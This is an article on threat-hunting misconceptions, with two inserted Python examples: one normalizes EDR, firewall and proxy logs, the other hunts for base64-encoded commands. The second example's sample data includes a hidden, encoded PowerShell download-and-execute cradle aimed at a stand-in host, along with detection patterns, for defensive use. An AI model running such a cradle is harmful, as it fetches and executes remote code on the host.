Threat hunting is a human-led, machine-assisted initiative, where hunters look at datasets and patterns to determine whether there’s malicious activity or an active adversary in the network. As companies try to stay ahead of the latest, ever-evolving threats, it’s a practice that has become increasingly important to help monitor and manage what’s happening on the network, detect unknown threats and respond appropriately to protect the business.

To put it simply, it’s a complicated process. There are understandably many misconceptions.
As a result, misdirection and misunderstanding are lulling people into a false sense of security and leaving businesses exposed.

Here, we’ll take a closer look at three common misconceptions about threat hunting and uncover what you really need to know to ensure a productive hunt.

Misconception #1: Threat hunting can be automated

The idea that threat hunting can be fully automated is the most disingenuous misconception out there. While parts of the process can be automated, the reality is that the human touch is necessary for any successful threat hunt. End-to-end, from identification to response, it’s not possible to automate the entire process.

Automation plays an important role in threat hunting, from data gathering to detecting known knowns. In an automation-initiated hunt, something might get flagged as suspicious via an automated rule. But, once that happens, you need a threat hunter to look at those clues and perform a strategic analysis. A machine can raise potential flags, but can’t make an intelligent decision about whether something is malicious or benign. There are a lot of things that happen in the grey area, where it’s difficult for a trained model to make the right judgment call. Human expertise is required to decipher those grey areas.

For example, if you see PsExec running on your network, it’s not necessarily immediately clear whether it’s malicious or harmless. It’s an admin tool that’s used for legitimate purposes, but it’s also often used by malware and attackers trying to do something nefarious. How do you know whether you’ve come across a malicious or benign case? Human expertise can provide context around the intent of that command, and evaluate whether it was malicious.

Misconception #2: Having endpoint detection and response (EDR) means that you’re doing threat hunting

Threat hunting and EDR aren’t the same thing. If you’ve purchased an EDR product, you’re not necessarily doing threat hunting. EDR, at its core, is a rich dataset that can be used to investigate or query information. But, while EDR is an essential tool in a threat hunter’s arsenal, it gives you only part of the story.

There are a number of other sources of information that are extremely valuable in the hunt. Endpoint data is important, but so is network traffic. Threat hunters will look beyond EDR data at networking logs, firewalls and intrusion detection and prevention system logs to get a more complete picture of the landscape. Pulling in any third-party data, like Active Directory information, Office 365 data, or data from any other applications in use, can enrich the dataset, and a rich dataset allows you to identify more complex threats.

Misconception #3: You can add data into a SIEM and start threat hunting

SIEMs do provide a useful service, in that they’re a place where we can input a lot of information and start asking questions of that data. But, one of the biggest challenges with SIEM is that it’s difficult to keep data consistent. And, unsurprisingly, poor data quality usually means a hunt will be unproductive.

The definition of quality data may be subjective, but at its core, ensuring that data from disparate systems is normalized and that data attributes (where possible) are standardized will go a long way.

Quality data is critical for a few reasons:
- It increases the productivity of a threat hunt, making it easier for team members to query large sets of data and retrieve consistent results.
- When data attributes are normalized, threat hunters can avoid joining different sets of data during a threat hunt, while allowing for richer context to identify more complex threats.
- Having a good understanding of the quality of your data allows the threat hunting team to have clear objectives on the data they CAN analyze and to set expectations on what they CANNOT analyze. This allows projects to be coordinated and prioritized to increase overall quality.
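The normalization the list above calls for, shown as an added example that is not code from the original article. Three constructed telemetry samples (an EDR JSON export, firewall key=value syslog, a proxy CSV) are mapped onto one schema with standardized attribute names and UTC ISO-8601 timestamps; the raw field names are assumptions, since every real product uses its own. A single question ("which devices talked to this IP?") is then asked once across all sources, and a coverage report makes explicit which attributes each source CAN and CANNOT answer.

```python
"""Normalize telemetry from different sources into one schema, then hunt across it.

Added example, not code from the original article. The three raw samples below
are constructed, and their field names (ts/hostname/local_addr, time/src/dst,
client/client_ip/dest_ip) are assumptions: real EDR, firewall and proxy products
use their own names, which is exactly why a normalization layer is needed.
"""
import csv
import io
import json
import re
from datetime import datetime, timezone

# Common schema every source is mapped onto. An attribute a source cannot supply
# is stored as None, so "this source cannot answer that question" stays visible.
SCHEMA = ("timestamp", "source", "host", "src_ip", "dst_ip", "dst_port", "process")

# --- constructed raw samples (epoch 1700000000 == 2023-11-14T22:13:20Z) ------
EDR_EVENTS = [  # JSON lines, epoch seconds, hostname known, process known
    '{"ts": 1700000000, "hostname": "ws-0412", "local_addr": "10.1.5.23", '
    '"remote_addr": "203.0.113.9", "remote_port": 443, "image": "PowerShell.exe"}',
    '{"ts": 1700000120, "hostname": "srv-db01", "local_addr": "10.1.7.5", '
    '"remote_addr": "10.1.7.6", "remote_port": 1433, "image": "sqlservr.exe"}',
]
FIREWALL_LINES = [  # key=value syslog style, epoch milliseconds, no hostnames
    "time=1700000005000 action=allow src=10.1.5.23 dst=203.0.113.9 dport=443",
    "time=1700000090000 action=deny src=10.1.9.77 dst=203.0.113.9 dport=8443",
]
PROXY_CSV = (  # CSV, ISO-8601 timestamps, client hostname but no process
    "timestamp,client,client_ip,dest_ip,dest_port\n"
    "2023-11-14T22:13:40Z,WS-0412,10.1.5.23,203.0.113.9,443\n"
    "2023-11-14T22:14:10Z,LT-0088,10.1.5.40,198.51.100.4,80\n"
)

def _iso(ts):
    """Standardize every timestamp to UTC ISO-8601 so sorting and joins line up."""
    return ts.astimezone(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")

def from_edr(line):
    raw = json.loads(line)
    return {"timestamp": _iso(datetime.fromtimestamp(raw["ts"], tz=timezone.utc)),
            "source": "edr", "host": raw["hostname"].upper(),
            "src_ip": raw["local_addr"], "dst_ip": raw["remote_addr"],
            "dst_port": int(raw["remote_port"]), "process": raw["image"].lower()}

_KV = re.compile(r"(\w+)=(\S+)")

def from_firewall(line):
    raw = dict(_KV.findall(line))
    ts = datetime.fromtimestamp(int(raw["time"]) / 1000, tz=timezone.utc)
    return {"timestamp": _iso(ts), "source": "firewall", "host": None,
            "src_ip": raw["src"], "dst_ip": raw["dst"],
            "dst_port": int(raw["dport"]), "process": None}

def from_proxy(text):
    rows = []
    for raw in csv.DictReader(io.StringIO(text)):
        ts = datetime.strptime(raw["timestamp"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        rows.append({"timestamp": _iso(ts), "source": "proxy",
                     "host": raw["client"].upper(), "src_ip": raw["client_ip"],
                     "dst_ip": raw["dest_ip"], "dst_port": int(raw["dest_port"]),
                     "process": None})
    return rows

def load_all():
    events = [from_edr(l) for l in EDR_EVENTS]
    events += [from_firewall(l) for l in FIREWALL_LINES]
    events += from_proxy(PROXY_CSV)
    return sorted(events, key=lambda e: e["timestamp"])

def talking_to(events, ip):
    """One question across all sources: which devices talked to `ip`?
    Keyed on src_ip because every source has it; hostnames are attached where a
    source can supply them, and the corroborating sources are listed so a hunter
    can see whether endpoint and network telemetry agree."""
    result = {}
    for e in events:
        if e["dst_ip"] == ip:
            entry = result.setdefault(e["src_ip"], {"hosts": set(), "sources": set()})
            entry["sources"].add(e["source"])
            if e["host"]:
                entry["hosts"].add(e["host"])
    return result

def coverage(events):
    """Per source, which schema attributes are ever populated (what the team CAN
    analyze from it) and which never are (what it CANNOT answer)."""
    seen = {}
    for e in events:
        flags = seen.setdefault(e["source"], {k: False for k in SCHEMA})
        for k in SCHEMA:
            if e[k] is not None:
                flags[k] = True
    return {s: {"can": [k for k in SCHEMA if f[k]],
                "cannot": [k for k in SCHEMA if not f[k]]} for s, f in seen.items()}

if __name__ == "__main__":
    evts = load_all()
    print(talking_to(evts, "203.0.113.9"))
    print(coverage(evts))
```

Running it shows 10.1.5.23 (WS-0412) reaching 203.0.113.9 with all three sources agreeing, while 10.1.9.77 appears only in the firewall data with no hostname, because the firewall cannot supply that attribute. That gap is visible in `coverage()` rather than silently producing an empty join, which is the point of knowing up front what each source CAN and CANNOT tell you.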
If you want to find out whether a device is talking to a certain IP address, for example, you can query the network logs, endpoint logs and anything else that might have that data attribute. When the data quality is consistent, the results of that query are more trustworthy. Ensuring consistency of the data coming into your platforms is something that’s often overlooked.

In addition to the automation-initiated threat hunting discussed earlier, there are two other types of threat hunting that both require rich datasets. In a lead-driven hunt, the threat hunter knows that an actor uses a certain technique, for example, and checks to see if that information is present in the dataset. A lead-less hunt, on the other hand, starts with a threat hunter asking a question or presenting a hypothesis – perhaps, “Base64 encoded content run on an endpoint is a common tactic used to obfuscate malicious activity” – and then looking in the data for supporting information.

Good data allows threat hunters to identify complex threats quickly and more accurately. When a threat hunter knows the data they’re working with is solid, they can be more effective and more efficient.

The bottom line

The data is just the beginning of the hunt. What’s more important is how you apply that data to find the initiation point of the threat. Making the data useful and making the data work for you: this is what machines can’t automate. In fact, if it could be fully automated, MDR (managed detection and response) as a category simply wouldn’t exist.

A hypothesis about the threat, a method, good data and the critical thinking of a talented hunter are the key ingredients to successful threat hunting. When suspicious activity occurs within the grey area, threat hunters can apply strategic analysis to decipher intent, and whether or not a response is needed to protect the business.
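The lead-less hunt described earlier, run over data, as an added example that is not code from the original article. It takes the article’s hypothesis (base64-encoded content run on an endpoint is a common way to obfuscate malicious activity), scans constructed process-creation events that are assumed to already be in a normalized schema (host, user, process, cmdline), decodes what it finds and highlights a few strings a hunter would want to see. It deliberately returns candidates rather than verdicts: the backup service account uses the very same encoding for a legitimate job, which is the grey area the article says a human still has to judge.

```python
"""Lead-less hunt for the hypothesis "base64-encoded content run on an endpoint
is a common way to obfuscate malicious activity".

Added example, not from the original article. The process-creation events are
constructed and assume an already-normalized schema (host, user, process,
cmdline); real EDR field names differ. The hunt returns decoded candidates with
the indicators it noticed; deciding malicious vs. benign is left to the hunter,
because the same technique appears in legitimate automation (see svc_backup).
"""
import base64
import binascii
import re

def ps_encode(script):
    """PowerShell -EncodedCommand takes base64 of UTF-16LE text; used here only
    to build the constructed samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

EVENTS = [  # constructed process-creation records
    {"host": "WS-0412", "user": "jdoe", "process": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand "
                + ps_encode("IEX ((New-Object Net.WebClient).DownloadString('http://example.invalid/a'))")},
    {"host": "SRV-FILE02", "user": "svc_backup", "process": "powershell.exe",  # nightly backup job
     "cmdline": "powershell.exe -enc "
                + ps_encode(r"Get-ChildItem \\FS02\backup -Recurse | Measure-Object -Sum Length")},
    {"host": "LT-0088", "user": "asmith", "process": "updater.exe",  # config passed as base64
     "cmdline": "updater.exe --config "
                + base64.b64encode(b"server=intranet.example;interval=300").decode("ascii")},
    {"host": "WS-0300", "user": "bking", "process": "cmd.exe",
     "cmdline": "cmd.exe /c echo QUFB > out.txt"},  # short token, below the size threshold
    {"host": "WS-0300", "user": "bking", "process": "notepad.exe",
     "cmdline": "notepad.exe report.txt"},
]

# Unambiguous prefixes of -EncodedCommand that PowerShell accepts, then the blob.
ENC_FLAG = re.compile(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
# Any other long base64-looking token on a command line, regardless of process.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Strings a hunter would want highlighted in decoded content (not a verdict).
INDICATORS = ("Invoke-Expression", "IEX", "DownloadString", "FromBase64String")

def decode_blob(token):
    """Decode base64 and return readable text, or None if it is not text.
    UTF-8 is tried first: UTF-16LE content decodes as UTF-8 too, but its NUL
    bytes fail the printable check, so it falls through to UTF-16LE."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    for encoding in ("utf-8", "utf-16-le"):
        try:
            text = raw.decode(encoding)
        except UnicodeDecodeError:
            continue
        if text and sum(c.isprintable() for c in text) / len(text) > 0.9:
            return text
    return None

def hunt(events):
    """Return every event whose command line carried decodable base64 text,
    with the decoded content and any indicator strings found in it."""
    findings = []
    for e in events:
        cmd = e["cmdline"]
        m = ENC_FLAG.search(cmd)
        if m:
            candidates = [(m.group(1), "encodedcommand")]
        else:
            candidates = [(t, "base64-like") for t in B64_TOKEN.findall(cmd)]
        for token, method in candidates:
            text = decode_blob(token)
            if text is None:
                continue  # binary or random data: not what this hypothesis is about
            findings.append({"host": e["host"], "user": e["user"],
                             "process": e["process"], "method": method,
                             "decoded": text,
                             "indicators": [i for i in INDICATORS if i.lower() in text.lower()]})
    return findings

if __name__ == "__main__":
    for f in hunt(EVENTS):
        print(f["host"], f["user"], f["method"], f["indicators"], "->", f["decoded"][:60])
```

The output puts three rows in front of the hunter: the jdoe event with indicators that merit a response, the svc_backup event with the same encoding but a plainly administrative script, and an updater passing its configuration as base64. The hypothesis found supporting data, but only the analyst, with context on the account, the host and the expected schedule, can say which of the three needs action.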